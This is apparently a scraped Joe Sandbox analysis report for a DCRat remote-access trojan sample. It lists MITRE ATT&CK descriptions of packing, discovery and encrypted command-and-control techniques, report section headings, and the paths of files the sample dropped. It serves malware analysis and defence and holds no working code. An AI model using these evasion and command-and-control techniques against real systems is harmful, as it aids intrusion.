Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kqq1aAcVUQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Recovery\3dcb0eb9430f8d

C:\Recovery\EeMFgDHDyZvTl.exe

C:\Users\Public\Pictures\3dcb0eb9430f8d

C:\Users\Public\Pictures\EeMFgDHDyZvTl.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Surrogatedll.exe.log

C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat

C:\Users\user\AppData\Local\Temp\MilWjNMpDI

C:\Users\user\Desktop\DWhAaqcM.log

C:\Users\user\Desktop\IPdRdIgb.log

C:\Users\user\Desktop\KCOiojdz.log

C:\Users\user\Desktop\RyxhNllI.log

C:\Users\user\Desktop\eMRvdFMJ.log

C:\Users\user\Desktop\hACmhobX.log

C:\Users\user\Desktop\nukLNhSq.log

Windows Analysis Report
kqq1aAcVUQ.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre